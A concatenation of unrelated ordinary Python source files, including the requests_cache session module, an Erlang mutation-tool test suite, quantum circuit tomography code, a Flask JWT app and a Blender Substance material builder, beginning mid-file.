write_file(self.project_name, "setup.py", setup_text)
def write_readme(self):
"""Creates file 'README.md' in project root.
Imports information from 'files/README.md' and substitudes project name and
author if possible.
"""
with open(os.path.join(FILES_DIR, "README.md"), "r") as inp:
readme_text = inp.read()
readme_text = readme_text.replace(r"{project_name}", self.project_name)
if self.author:
readme_text = readme_text.replace("{author}", self.author)
write_file(self.project_name, "README.md", readme_text)
|
"""
Classes from the 'CoreMIDI' framework.
"""
try:
from rubicon.objc import ObjCClass
except ValueError:
def ObjCClass(name):
return None
def _Class(name):
try:
return ObjCClass(name)
except NameError:
return None
MIDINetworkConnection = _Class("MIDINetworkConnection")
MIDINetworkHost = _Class("MIDINetworkHost")
MIDINetworkSession = _Class("MIDINetworkSession")
MIDICIResponder = _Class("MIDICIResponder")
MIDICIDiscoveryManager = _Class("MIDICIDiscoveryManager")
MIDICIDiscoveredNode = _Class("MIDICIDiscoveredNode")
BLEMIDIAccessor = _Class("BLEMIDIAccessor")
MIDICISession = _Class("MIDICISession")
MIDICIProfileState = _Class("MIDICIProfileState")
MIDICIProfile = _Class("MIDICIProfile")
MIDICIDeviceInfo = _Class("MIDICIDeviceInfo")
|
from .entities import Compound, Entity, Class, File, Struct, Namespace
from . import xml
import os
from typing import List, Dict
class ParserBase:
def __init__(self, xmldir : str):
self._xmldir = xmldir
def _reffile(self, refid : str) -> str:
return os.path.join(self._xmldir, refid+".xml")
def _load(self, refid : str) -> xml.NodeType:
return xml.etree.parse(self._reffile(refid)).getroot()
class Parser(ParserBase):
def __init__(self, xmldir : str):
super().__init__(xmldir)
self.compounds : List[Compound] = []
self.entities : Dict[str, Entity] = {}
self._refidmap : Dict[str, Entity] = {}
self._root = self._load("index")
for child in self._root:
if child.tag == "compound":
self._handle_compound(child)
delkeys = []
items = list(self.entities.items())
# reset all entity keys to their fqns
for k, v in items:
if k != v.fqn:
self.entities[v.fqn] = v
delkeys.append(k)
# recreate all parent fqns stored in entities
for k, v in items:
v.parent = v.parent
# now remove obsolete partial fqns
for k in delkeys:
del self.entities[k]
def _handle_compound(self, node : xml.NodeType) -> None:
refid = node.attrib["refid"]
kind = node.attrib["kind"]
refroot = self._load(refid)
cmpdef = refroot.find("compounddef")
assert cmpdef is not None
if kind == "class":
cls = Class(cmpdef, self.entities, self._refidmap)
self.compounds.append(cls)
self.entities[cls.fqn] = cls
self._refidmap[cls.refid] = cls
elif kind == "struct":
strct = Struct(cmpdef, self.entities, self._refidmap)
self.compounds.append(strct)
self.entities[strct.fqn] = strct
self._refidmap[strct.refid] = strct
elif kind == "file":
file : File = File(cmpdef, self.entities)
self.compounds.append(file)
self._refidmap[file.refid] = file
elif kind == "namespace":
ns : Namespace = Namespace(cmpdef, self.entities, self._refidmap)
self.compounds.append(ns)
self.entities[ns.fqn] = ns
self._refidmap[ns.refid] = ns
else:
raise ValueError("Unkown compound %s"%kind)
|
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
|
from spatialfilter import CAR, Whitening, SymWhitening, CSP, Deflate
from timefreq import TFC
from filter import Filter, OnlineFilter, Winsorize
from window import SlidingWindow, OnlineSlidingWindow
from wrapper import Decimate, Slice
from nonstat import SlowSphering
|
#!/usr/bin/env python
"""
requests_cache.core
~~~~~~~~~~~~~~~~~~~
Core functions for configuring cache and monkey patching ``requests``
"""
from contextlib import contextmanager
from datetime import datetime, timedelta
from operator import itemgetter
import requests
from requests import Session as OriginalSession
from requests.hooks import dispatch_hook
from . import backends
class CachedSession(OriginalSession):
"""Requests ``Sessions`` with caching support."""
def __init__(
self,
cache_name='cache',
backend=None,
expire_after=None,
allowable_codes=(200,),
allowable_methods=('GET',),
filter_fn=lambda r: True,
old_data_on_error=False,
**backend_options
):
"""
:param cache_name: for ``sqlite`` backend: cache file will start with this prefix,
e.g ``cache.sqlite``
for ``mongodb``: it's used as database name
for ``redis``: it's used as the namespace. This means all keys
are prefixed with ``'cache_name:'``
:param backend: cache backend name e.g ``'sqlite'``, ``'mongodb'``, ``'redis'``, ``'memory'``.
(see :ref:`persistence`). Or instance of backend implementation.
Default value is ``None``, which means use ``'sqlite'`` if available,
otherwise fallback to ``'memory'``.
:param expire_after: ``timedelta`` or number of seconds after cache will be expired
or `None` (default) to ignore expiration
:type expire_after: float
:param allowable_codes: limit caching only for response with this codes (default: 200)
:type allowable_codes: tuple
:param allowable_methods: cache only requests of this methods (default: 'GET')
:type allowable_methods: tuple
:param filter_fn: function to apply to each response; the response is only cached if
this returns `True`. Note that this function does not not modify
the cached response in any way.
:type filter_fn: function
:kwarg backend_options: options for chosen backend. See corresponding
:ref:`sqlite <backends_sqlite>`, :ref:`mongo <backends_mongo>`
and :ref:`redis <backends_redis>` backends API documentation
:param include_get_headers: If `True` headers will be part of cache key.
E.g. after get('some_link', headers={'Accept':'application/json'})
get('some_link', headers={'Accept':'application/xml'}) is not from cache.
:param ignored_parameters: List of parameters to be excluded from the cache key.
Useful when requesting the same resource through different
credentials or access tokens, passed as parameters.
:param old_data_on_error: If `True` it will return expired cached response if update fails
"""
self.cache = backends.create_backend(backend, cache_name, backend_options)
self._cache_name = cache_name
if expire_after is not None and not isinstance(expire_after, timedelta):
expire_after = timedelta(seconds=expire_after)
self._cache_expire_after = expire_after
self._cache_allowable_codes = allowable_codes
self._cache_allowable_methods = allowable_methods
self._filter_fn = filter_fn
self._return_old_data_on_error = old_data_on_error
self._is_cache_disabled = False
super(CachedSession, self).__init__()
def send(self, request, **kwargs):
if self._is_cache_disabled or request.method not in self._cache_allowable_methods:
response = super(CachedSession, self).send(request, **kwargs)
response.from_cache = False
response.cache_date = None
return response
cache_key = self.cache.create_key(request)
def send_request_and_cache_response():
response = super(CachedSession, self).send(request, **kwargs)
if response.status_code in self._cache_allowable_codes:
self.cache.save_response(cache_key, response)
response.from_cache = False
response.cache_date = None
return response
try:
response, timestamp = self.cache.get_response_and_time(cache_key)
except (ImportError, TypeError):
return send_request_and_cache_response()
if response is None:
return send_request_and_cache_response()
if self._cache_expire_after is not None:
is_expired = datetime.utcnow() - timestamp > self._cache_expire_after
if is_expired:
if not self._return_old_data_on_error:
self.cache.delete(cache_key)
return send_request_and_cache_response()
try:
new_response = send_request_and_cache_response()
except Exception:
return response
else:
if new_response.status_code not in self._cache_allowable_codes:
return response
return new_response
# dispatch hook here, because we've removed it before pickling
response.from_cache = True
response.cache_date = timestamp
response = dispatch_hook('response', request.hooks, response, **kwargs)
return response
def request(self, method, url, params=None, data=None, **kwargs):
response = super(CachedSession, self).request(
method, url, _normalize_parameters(params), _normalize_parameters(data), **kwargs
)
if self._is_cache_disabled:
return response
main_key = self.cache.create_key(response.request)
# If self._return_old_data_on_error is set,
# responses won't always have the from_cache attribute.
if hasattr(response, "from_cache") and not response.from_cache and self._filter_fn(response) is not True:
self.cache.delete(main_key)
return response
for r in response.history:
self.cache.add_key_mapping(self.cache.create_key(r.request), main_key)
return response
@contextmanager
def cache_disabled(self):
"""
Context manager for temporary disabling cache
::
>>> s = CachedSession()
>>> with s.cache_disabled():
... s.get('http://httpbin.org/ip')
"""
self._is_cache_disabled = True
try:
yield
finally:
self._is_cache_disabled = False
def remove_expired_responses(self):
"""Removes expired responses from storage"""
if not self._cache_expire_after:
return
self.cache.remove_old_entries(datetime.utcnow() - self._cache_expire_after)
def __repr__(self):
return "<CachedSession(%s('%s', ...), expire_after=%s, " "allowable_methods=%s)>" % (
self.cache.__class__.__name__,
self._cache_name,
self._cache_expire_after,
self._cache_allowable_methods,
)
def install_cache(
cache_name='cache',
backend=None,
expire_after=None,
allowable_codes=(200,),
allowable_methods=('GET',),
filter_fn=lambda r: True,
session_factory=CachedSession,
**backend_options
):
"""
Installs cache for all ``Requests`` requests by monkey-patching ``Session``
Parameters are the same as in :class:`CachedSession`. Additional parameters:
:param session_factory: Session factory. It must be class which inherits :class:`CachedSession` (default)
"""
if backend:
backend = backends.create_backend(backend, cache_name, backend_options)
class _ConfiguredCachedSession(session_factory):
def __init__(self):
super(_ConfiguredCachedSession, self).__init__(
cache_name=cache_name,
backend=backend,
expire_after=expire_after,
allowable_codes=allowable_codes,
allowable_methods=allowable_methods,
filter_fn=filter_fn,
**backend_options
)
_patch_session_factory(_ConfiguredCachedSession)
def uninstall_cache():
"""Restores ``requests.Session`` and disables cache"""
_patch_session_factory(OriginalSession)
@contextmanager
def disabled():
"""
Context manager for temporary disabling globally installed cache
.. warning:: not thread-safe
::
>>> with requests_cache.disabled():
... requests.get('http://httpbin.org/ip')
... requests.get('http://httpbin.org/get')
"""
previous = requests.Session
uninstall_cache()
try:
yield
finally:
_patch_session_factory(previous)
@contextmanager
def enabled(*args, **kwargs):
"""
Context manager for temporary installing global cache.
Accepts same arguments as :func:`install_cache`
.. warning:: not thread-safe
::
>>> with requests_cache.enabled('cache_db'):
... requests.get('http://httpbin.org/get')
"""
install_cache(*args, **kwargs)
try:
yield
finally:
uninstall_cache()
def get_cache():
"""Returns internal cache object from globally installed ``CachedSession``"""
return requests.Session().cache
def clear():
"""Clears globally installed cache"""
get_cache().clear()
def remove_expired_responses():
"""Removes expired responses from storage"""
return requests.Session().remove_expired_responses()
def _patch_session_factory(session_factory=CachedSession):
requests.Session = requests.sessions.Session = session_factory
def _normalize_parameters(params):
"""If builtin dict is passed as parameter, returns sorted list
of key-value pairs
"""
if type(params) is dict:
return sorted(params.items(), key=itemgetter(0))
return params
|
#!/usr/bin/env nosetests
import os
import imp
import shutil
import subprocess
import muterl_lex
import muterl_logic
import muterl_clause
import muterl_constants
if os.path.isdir('test_tmp'):
shutil.rmtree('test_tmp')
good_sources = [{'name': 'jsx',
'git': 'https://github.com/talentdeficit/jsx',
'revision': 'c61be973b95ba4cc5fd646d1f80b65b8eeba8376'},
{'name': 'mochiweb',
'git': 'https://github.com/mochi/mochiweb',
'revision': 'aacb8f2e2fd98a729bd4f54e028c6b742bfb9dcb'},
{'name': 'poolboy',
'git': 'https://github.com/devinus/poolboy',
'revision': 'd378f996182daa6251ad5438cee4d3f6eb7ea50f'},
{'name': 'lfe',
'git': 'https://github.com/rvirding/lfe',
'revision': 'c05fa59ecf51e345069787476b9e699e42be8cf6'}]
from nose.tools import eq_
def test_parsing():
map(parse_source, good_sources)
def contents(filename):
with open(filename) as file:
return file.read()
def parse_source(source):
path = os.getcwd()
subprocess.check_call("git clone " + source["git"] + " test_tmp/" + source["name"], shell=True)
os.chdir(path + "/test_tmp/" + source["name"])
subprocess.check_call("git checkout "+ source["revision"], shell=True)
try:
subprocess.check_call("../../muterl --check-parsing", shell=True)
finally:
os.chdir(path)
def test_removeclause():
ast = muterl_lex.lex(("simple.erl", contents("test_data/simple.erl")))
eq_(muterl_clause.clause_count(ast), 5)
muterl_clause.clause_remove(0, ast, "test_tmp/simple_remove0.erl.res")
muterl_clause.clause_remove(1, ast, "test_tmp/simple_remove1.erl.res")
subprocess.check_call("diff test_tmp/simple_remove0.erl.res test_data/simple_remove0.erl", shell=True)
subprocess.check_call("diff test_tmp/simple_remove1.erl.res test_data/simple_remove1.erl", shell=True)
def test_inverse():
ast = muterl_lex.lex(("simple2.erl", contents("test_data/simple2.erl")))
muterl_logic.inverse(0, ast, "test_tmp/simple2_inverse.erl.res")
subprocess.check_call("diff test_tmp/simple2_inverse.erl.res test_data/simple2_inverse.erl", shell=True)
def test_constants():
ast = muterl_lex.lex(("simple2.erl", contents("test_data/simple2.erl")))
muterl_constants.change(0, ast, "test_tmp/simple2_constant.erl.res")
subprocess.check_call("diff test_tmp/simple2_constant.erl.res test_data/simple2_constant.erl", shell=True)
|
from .run import run_pauli_expectation
from .resolution import build_quasar_circuit
from .circuit import Circuit
import numpy as np
import itertools
class Tomography(object):
def __init__(self):
raise NotImplementedError
@property
def nparam(self):
raise NotImplementedError
def compute_observable_expectation_value(
self,
params,
):
raise NotImplementedError
def compute_observable_expectation_value_gradient(
self,
params,
):
raise NotImplementedError
def compute_observable_expectation_value_hessian(
self,
params,
):
raise NotImplementedError
class RotationTomography(Tomography):
def __init__(
self,
coefs,
):
self.coefs = coefs
@property
def nparam(self):
return self.coefs.ndim
def compute_observable_expectation_value(
self,
params,
):
if params.ndim < 2: raise RuntimeError('params.ndim < 2')
if params.shape[0] != self.nparam: raise RuntimeError('params.shape[0] != self.nparam')
# NOTE: Special case (bare coefficent)
if self.coefs.ndim == 0: return self.coefs
bs = []
for theta in params:
bs.append([
np.ones_like(theta),
np.cos(2.0 * theta),
np.sin(2.0 * theta),
])
O = np.zeros_like(params[0])
for Js in itertools.product(range(3), repeat=self.nparam):
R = np.ones_like(params[0])
for J2, J in enumerate(Js):
R *= bs[J2][J]
O += self.coefs[Js] * R
return O
def compute_observable_expectation_value_gradient(
self,
params,
):
if params.ndim < 2: raise RuntimeError('params.ndim < 2')
if params.shape[0] != self.nparam: raise RuntimeError('params.shape[0] != self.nparam')
G = np.zeros((self.nparam,) + params[0].shape)
for k in range(self.nparam):
notk = [_ for _ in range(self.nparam) if _ != k]
paramsk = params[k]
params2 = params[notk]
coefs_b = np.take(self.coefs, 1, k)
coefs_c = np.take(self.coefs, 2, k)
tomography_b = RotationTomography(coefs_b)
tomography_c = RotationTomography(coefs_c)
Ob = tomography_b.compute_observable_expectation_value(params2)
Oc = tomography_c.compute_observable_expectation_value(params2)
G[k] = -2.0 * np.sin(2.0 * paramsk) * Ob + 2.0 * np.cos(2.0 * paramsk) * Oc
return G
def compute_observable_expectation_value_hessian(
self,
params,
):
if params.ndim < 2: raise RuntimeError('params.ndim < 2')
if params.shape[0] != self.nparam: raise RuntimeError('params.shape[0] != self.nparam')
H = np.zeros((self.nparam,)*2 + params[0].shape)
for k in range(self.nparam):
notk = [_ for _ in range(self.nparam) if _ != k]
paramsk = params[k]
params2 = params[notk]
coefs_b = np.take(self.coefs, 1, k)
coefs_c = np.take(self.coefs, 2, k)
tomography_b = RotationTomography(coefs_b)
tomography_c = RotationTomography(coefs_c)
Ob = tomography_b.compute_observable_expectation_value(params2)
Oc = tomography_c.compute_observable_expectation_value(params2)
if len(notk):
Gb = tomography_b.compute_observable_expectation_value_gradient(params2)
Gc = tomography_c.compute_observable_expectation_value_gradient(params2)
H[k,notk] = -2.0 * np.sin(2.0 * paramsk) * Gb + 2.0 * np.cos(2.0 * paramsk) * Gc
H[k, k] = - 4.0 * np.cos(2.0 * paramsk) * Ob - 4.0 * np.sin(2.0 * paramsk) * Oc
return H
# > Tomography quadrature utility < #
@staticmethod
def quad_x(D=1):
return np.array(np.meshgrid(
*[[-np.pi / 3.0, 0.0, +np.pi / 3.0]]*D,
indexing='ij',
))
@staticmethod
def quad_transfer(D=1):
T1 = np.array([
[1.0, -0.5, -np.sqrt(3.0)/2.0,],
[1.0, 1.0, 0.0,],
[1.0, -0.5, +np.sqrt(3.0)/2.0,],
], dtype=np.float)
T = np.copy(T1)
for D2 in range(1,D):
T = np.kron(T, T1)
T *= 0.5**D
return T
@staticmethod
def quad_transfer_inv(D=1):
T1inv = np.array([
[ 1.0, 1.0, 1.0,],
[ -1.0, 2.0, -1.0,],
[-np.sqrt(3.0), 0.0, +np.sqrt(3.0),],
], dtype=np.float) / 3.0
Tinv = np.copy(T1inv)
for D2 in range(1,D):
Tinv = np.kron(Tinv, T1inv)
return Tinv
@staticmethod
def quad_coefs(O):
return np.reshape(np.dot(RotationTomography.quad_transfer_inv(D=O.ndim), O.ravel()), O.shape)
# => Optimization <= #
def optimize_jacobi_1(
self,
theta0=None,
n=100,
d=0,
):
if theta0 is None:
theta0 = np.zeros((self.nparam,))
theta = np.copy(theta0)
thetas = [theta0]
for iteration in range(n):
k = (iteration + d) % self.nparam
theta_2 = np.array([theta for k2, theta in enumerate(theta) if k2 != k])
theta_2 = np.reshape(theta_2, theta_2.shape + (1,))
coefs_b = np.take(self.coefs, 1, k)
coefs_c = np.take(self.coefs, 2, k)
tomography_b = RotationTomography(coefs_b)
tomography_c = RotationTomography(coefs_c)
Ob = tomography_b.compute_observable_expectation_value(theta_2)
Oc = tomography_c.compute_observable_expectation_value(theta_2)
theta[k] = 0.5 * np.arctan2(-Oc, -Ob)
thetas.append(np.copy(theta))
thetas = np.array(thetas)
return thetas.T
def optimize_jacobi_1_best(
self,
theta0=None,
n=100,
):
thetas = []
for d in range(self.nparam):
thetas.append(self.optimize_jacobi_1(
theta0=theta0,
n=n,
d=d,
))
Os = np.array([self.compute_observable_expectation_value(theta2[:,-2:-1]) for theta2 in thetas])
return thetas[np.argmin(Os)]
def optimize(self):
return self.optimize_jacobi_1_best()[:,-1]
def run_observable_expectation_value_tomography(
backend,
circuit,
pauli,
nmeasurement=None,
param_indices=None,
**kwargs):
# No dropthrough - always need quasar.Circuit to manipulate
circuit = build_quasar_circuit(circuit).copy()
param_values = circuit.param_values
# Default to doing tomography over all parameters (NOTE: This costs 3**nparam pauli expectation values)
if param_indices is None:
param_indices = tuple(range(circuit.nparam))
# Check that the tomography formula is known for these parameters (i.e., Rx, Ry, Rz gates)
param_keys = circuit.param_keys
for param_index in param_indices:
key = param_keys[param_index]
time, qubits, name = key
gate = circuit.gates[(time, qubits)]
if not gate.name in ('Rx', 'Ry', 'Rz'):
raise RuntimeError('Unknown tomography rule: presently can only tomography Rx, Ry, Rz gates: %s' % gate)
# The tomography quadrature grid
T = RotationTomography.quad_x(len(param_indices))
O = np.zeros_like(T[0])
npoint = T.size // T.shape[0]
for I in range(npoint):
param_values2 = param_values.copy()
for param_index, T2 in zip(param_indices, T):
param_values2[param_index] = T2.ravel()[I]
circuit.set_param_values(param_values2)
O.ravel()[I] = run_pauli_expectation(backend, circuit, pauli, nmeasurement, **kwargs).dot(pauli).real # TODO: do we need this to be real
# Tomography fitting
coefs = RotationTomography.quad_coefs(O)
# Finished RotationTomography object
return RotationTomography(coefs=coefs)
def run_ensemble_observable_expectation_value_tomography(
backend,
reference_circuits,
reference_weights,
circuit,
pauli,
nmeasurement=None,
param_indices=None,
**kwargs):
# No dropthrough - always need quasar.Circuit to manipulate
reference_circuits = [build_quasar_circuit(_) for _ in reference_circuits]
circuit = build_quasar_circuit(circuit).copy()
param_values = circuit.param_values
# Default to doing tomography over all parameters (NOTE: This costs 3**nparam pauli expectation values)
if param_indices is None:
param_indices = tuple(range(circuit.nparam))
# Check that the tomography formula is known for these parameters (i.e., Rx, Ry, Rz gates)
param_keys = circuit.param_keys
for param_index in param_indices:
key = param_keys[param_index]
time, qubits, name = key
gate = circuit.gates[(time, qubits)]
if not gate.name in ('Rx', 'Ry', 'Rz'):
raise RuntimeError('Unknown tomography rule: presently can only tomography Rx, Ry, Rz gates: %s' % gate)
# The tomography quadrature grid
T = RotationTomography.quad_x(len(param_indices))
O = np.zeros_like(T[0])
npoint = T.size // T.shape[0]
for I in range(npoint):
param_values2 = param_values.copy()
for param_index, T2 in zip(param_indices, T):
param_values2[param_index] = T2.ravel()[I]
circuit.set_param_values(param_values2)
Oval = 0.0
for ref, w in zip(reference_circuits, reference_weights):
circuit2 = Circuit.concatenate([ref, circuit])
Oval += w * run_pauli_expectation(backend, circuit2, pauli, nmeasurement, **kwargs).dot(pauli).real # TODO: do we need this to be real
O.ravel()[I] = Oval
# Tomography fitting
coefs = RotationTomography.quad_coefs(O)
# Finished RotationTomography object
return RotationTomography(coefs=coefs)
|
from datetime import datetime, timedelta
from flask import Flask
from flask_cors import CORS
from flask_jwt_simple import JWTManager
from uranus_middleware.auth_utils import JWT_SECRET_KEY
from uranus_middleware.endpoints import init_app
from uranus_middleware.resources import (
airport, auth, boarding_pass, check_in, flight, health, infomation, luggage, passenger, password, user
)
app = Flask(__name__)
app.config['JWT_SECRET_KEY'] = JWT_SECRET_KEY
JWT_EXPIRES = timedelta(days=30)
jwt = JWTManager(app)
@jwt.jwt_data_loader
def add_claims_to_access_token(user):
now = datetime.utcnow()
return {
'iss': 'uranus',
'exp': now + JWT_EXPIRES,
'iat': now,
'role': user['role'],
'identifier': user['id']
}
app.register_blueprint(health.health_blueprint)
app.register_blueprint(user.user_blueprint)
app.register_blueprint(auth.auth_blueprint)
app.register_blueprint(airport.airport_blueprint)
app.register_blueprint(flight.flight_blueprint)
app.register_blueprint(passenger.passenger_blueprint)
app.register_blueprint(password.password_blueprint)
app.register_blueprint(infomation.info_blueprint)
app.register_blueprint(check_in.checkin_blueprint)
app.register_blueprint(luggage.luggage_blueprint)
app.register_blueprint(boarding_pass.boarding_pass_blueprint)
CORS(app)
init_app(app)
if __name__ == '__main__':
from gevent import pywsgi
from geventwebsocket.handler import WebSocketHandler
server = pywsgi.WSGIServer(('', 5000), app, handler_class=WebSocketHandler)
server.serve_forever()
|
# -*- coding: utf-8 -*-
"""Clothing data provider."""
from mimesis.providers.base import BaseProvider
__all__ = ['Clothing']
class Clothing(BaseProvider):
"""Class for generate data related to clothing."""
class Meta:
"""Class for metadata."""
name = 'clothing'
def international_size(self) -> str:
"""Get a random size in international format.
:return: Clothing size.
"""
return self.random.choice(['L', 'M', 'S', 'XL',
'XS', 'XXL', 'XXS', 'XXXL'])
def european_size(self) -> int:
"""Generate a random clothing size in European format.
:return: Clothing size.
"""
return self.random.randint(38, 62)
def custom_size(self, minimum: int = 40, maximum: int = 62) -> int:
"""Generate clothing size using custom format.
:param minimum: Minimum value.
:param maximum: Maximum value.
:return: Clothing size.
"""
return self.random.randint(minimum, maximum)
|
import traceback
class FunctionCollection:
"""
Args:
on_error: function, launched when function in collection raises an
exception
on_error_kwargs: additional kwargs for on_error function
include_exceptions: include exceptions into final result dict
"""
def __init__(self, **kwargs):
self._functions = []
self._functions_with_priorities = []
self.on_error = kwargs.get('on_error')
self.on_error_kwargs = kwargs.get('on_error_kwargs', {})
self.include_exceptions = True if kwargs.get(
'include_exceptions') else False
self.default_priority = 100
def __call__(self, f=None, **kwargs):
def wrapper(f, **kw):
self.append(f, **kwargs)
if f:
self.append(f)
return f
elif kwargs:
return wrapper
else:
return self.run()
def append(self, f, priority=None):
"""
Append function without annotation
Args:
f: function
priority: function priority
"""
if f not in self._functions:
self._functions.append(f)
self._functions_with_priorities.append({
'p': priority if priority else self.default_priority,
'f': f
})
def remove(self, f):
"""
Remove function
Args:
f: function
"""
try:
self._functions.remove(f)
for z in self._functions_with_priorities:
if z['f'] is f:
self._functions_with_priorities.remove(z)
break
except:
self.error()
def run(self):
"""
Run all functions in collection
Returns:
result dict as
{ '<function>': '<function_return>', ... }
"""
return self.execute()[0]
def execute(self):
"""
Run all functions in collection
Returns:
a tuple
{ '<function>': '<function_return>', ...}, ALL_OK
where ALL_OK is True if no function raised an exception
"""
result = {}
all_ok = True
funclist = sorted(self._functions_with_priorities, key=lambda k: k['p'])
for fn in funclist:
f = fn['f']
k = '{}.{}'.format(f.__module__, f.__name__)
try:
result[k] = f()
except Exception as e:
if self.include_exceptions:
result[k] = (e, traceback.format_exc())
else:
result[k] = None
self.error()
all_ok = False
return result, all_ok
def error(self):
if self.on_error:
self.on_error(**self.on_error_kwargs)
else:
raise
|
"""
Copyright (C) 2021 Adobe.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
# Substance Node Graph
# 02/23/2021
import bpy
import bmesh
from mathutils import Vector
import os
# UI layout parameters
UI_DispNodeYPos = -350
UI_TextureYPosIncrement = -275
UI_TextureXPosOffset = -575
UI_NormalNodeXPosOffset = -250
UI_TexCoordXOffset = -200
UI_MappingXPosOffset = 400
UI_InputNodeXPosOffset = -1000
UI_InputNodeYPosOffset = -200
UI_MappingWidth = 240
UI_ReroutingXPosOffset = -675
UI_ValueNodeYOffset = 150
UI_ValueNodeYIncrement = 200
UI_SBSAR_OutputXOffset = 200
UI_NODEGROUP_XOffset = 300
# UI Socket Name
UV_SOCKET_NAME = 'UV'
def GetPropertyClassKeywordAttribute(propertyClass, attribute):
""" Get the keyword attribute from the property class """
if hasattr(propertyClass, 'keywords'):
# starting with blender 2.93 use keywords
return propertyClass.keywords[attribute]
else:
# no longer supported as of blender 2.93
return propertyClass[1][attribute]
class SbsarOutputLink():
""" The data needed to create/destroy an output link """
def __init__(self, to, fr):
""" Initialize the data """
self.toSocket = to
self.fromSocket = fr
self.link = None
self.enabled = False
def addLink(self, links):
""" Add a blender UI link """
try:
self.link = links.new(self.fromSocket, self.toSocket)
self.enabled = True
except Exception as e:
print('Faled to add link: ' + str(e))
def removeLink(self, links):
""" Remove a blender UI Link """
try:
if self.link:
links.remove(self.link)
self.enabled = False
except Exception as e:
print('Failed to remove link: ' + str(e))
def CreateMaterial(paramManager, sbsarData, context, texture_preference_map, obj):
""" Create a blender material from the sbsar data """
if obj is None:
print('Loading an SBSAR requires an object in scene in order to create the blender material')
return
# load the material
mat = bpy.data.materials.get('sbsarData.name')
if mat is not None:
bpy.data.materials.remove(mat)
mat = bpy.data.materials.new(name=sbsarData.name)
mat.use_nodes = True
nodes = mat.node_tree.nodes
links = mat.node_tree.links
bsdf = nodes['Principled BSDF']
shaderPos = bsdf.location
# create substance node group
sbsar_name = sbsarData.name
substanceNodeGroup = bpy.data.node_groups.new(type='ShaderNodeTree', name=sbsar_name)
substanceNodes = substanceNodeGroup.nodes
# setup group output node
output_node = substanceNodes.new('NodeGroupOutput')
output_node.location = (UI_SBSAR_OutputXOffset, 0)
# cache the newly created nodes to create the proper UI mappings
newTexNodes = []
newValNodes = []
textureIndex = 0
for blender_texture_prop in texture_preference_map.__annotations__:
blendTexProp = texture_preference_map.__annotations__[blender_texture_prop]
prop_name = GetPropertyClassKeywordAttribute(blendTexProp, 'name')
# Create Blender nodes form the SBSAR output data
if prop_name in sbsarData.mapped_outputs.keys():
texPath, output_value, id = sbsarData.mapped_outputs[prop_name]
# Load the mapped texture
if len(texPath) > 0:
if os.path.exists(texPath):
texNode = substanceNodes.new('ShaderNodeTexImage')
# the node name is in two parts the first is used for relinking upon loading a blend file
# the sceond part of the name is the property ID, used when receiving updates from the Tools
texNode.name = sbsarData.id + '.' + str(id)
texNode.image = bpy.data.images.load(texPath)
texNode.label = prop_name
yPos = shaderPos[1] + (textureIndex * UI_TextureYPosIncrement)
texNode.location = Vector((UI_TextureXPosOffset, yPos))
# setup normal node
if prop_name == 'Normal' or prop_name == 'Clearcoat Normal':
normalNode = substanceNodes.new(type='ShaderNodeNormalMap')
substanceNodeGroup.outputs.new('NodeSocketVector', prop_name)
substanceNodeGroup.links.new(normalNode.inputs[1], texNode.outputs[0])
normalNode.location = Vector((UI_NormalNodeXPosOffset, yPos))
substanceNodeGroup.links.new(normalNode.outputs[0], output_node.inputs[texNode.label])
# setup displacement node
elif prop_name == 'Displacement':
dispNode = nodes.new(type='ShaderNodeDisplacement')
dispNode.name = 'SBSARDispNode'
dispNode.inputs['Scale'].default_value = texture_preference_map.displacementScale
substanceNodeGroup.outputs.new('NodeSocketVector', 'Height')
substanceNodeGroup.links.new(texNode.outputs[0], output_node.inputs['Height'])
dispNode.location = Vector((bsdf.location[0], UI_DispNodeYPos))
links.new(dispNode.outputs['Displacement'], nodes['Material Output'].inputs['Displacement'])
# setup all other output nodes
else:
substanceNodeGroup.outputs.new('NodeSocketColor', prop_name)
substanceNodeGroup.links.new(texNode.outputs['Color'], output_node.inputs[texNode.label])
SetTexNodeColorSpace(texNode)
sbsarData.textureNodes.append(texNode)
newTexNodes.append(texNode)
textureIndex += 1
else:
print('Texture does not exist: ' + texPath)
return None
# Load the value output
elif output_value is not None:
valueNode = substanceNodes.new('ShaderNodeValue')
valueNode.name = str(id)
valueNode.label = prop_name
valueNode.outputs[0].default_value = output_value
substanceNodeGroup.outputs.new('NodeSocketFloat', prop_name)
substanceNodeGroup.links.new(valueNode.outputs['Value'], output_node.inputs[valueNode.label])
sbsarData.valueNodes.append(valueNode)
newValNodes.append(valueNode)
else:
print('No Outputs for Prop: ' + prop_name)
# add the newly created blender material to the object
if len(newTexNodes) > 0:
# add the material to the object
obj.data.materials.append(mat)
# set the active material index to the newly created material
obj.active_material_index = len(obj.data.materials) - 1
if bpy.context.object is None:
context.view_layer.objects.active = obj
obj.select_set(True)
# apply material to all faces which must be done in 'EDIT' Mode
currentMode = bpy.context.object.mode
bpy.ops.object.mode_set(mode='EDIT')
bm = bmesh.from_edit_mesh(obj.data)
for face in bm.faces:
face.material_index = obj.active_material_index
bpy.ops.object.mode_set(mode=currentMode)
# build the Material evel group node
group_node = nodes.new('ShaderNodeGroup')
group_node.name = sbsar_name + '_sbsar_group'
group_node.node_tree = substanceNodeGroup
group_node.location = (shaderPos[0] - UI_NODEGROUP_XOffset, shaderPos[1])
group_node.select = True
nodes.active = group_node
# link up the graph
DrawMappingUI(context, substanceNodeGroup, bsdf.location[0], shaderPos[1], newTexNodes, newValNodes)
CreateUVMapping(mat, group_node, newTexNodes)
# setup the group outputs and map to the Shader
for output in group_node.outputs:
enabled = True
linkName = output.name
if output.name in sbsarData.outputLinks:
enabled = sbsarData.outputLinks[output.name].enabled
if output.name == 'Height':
toNode = dispNode.inputs['Height']
linkName = 'Displacement'
else:
toNode = bsdf.inputs[output.name]
oLink = SbsarOutputLink(toNode, output)
if enabled:
oLink.addLink(links)
sbsarData.outputLinks[linkName] = oLink
return mat
return None
def CreateUVMapping(mat, groupNode, texNodes):
""" Create a the blender UV Mapping nodes """
# create the input node for the substance group if needed
groupInputNode = groupNode.node_tree.nodes.get('NodeGroupInput', None)
if not groupInputNode:
groupInputNode = groupNode.node_tree.nodes.new('NodeGroupInput')
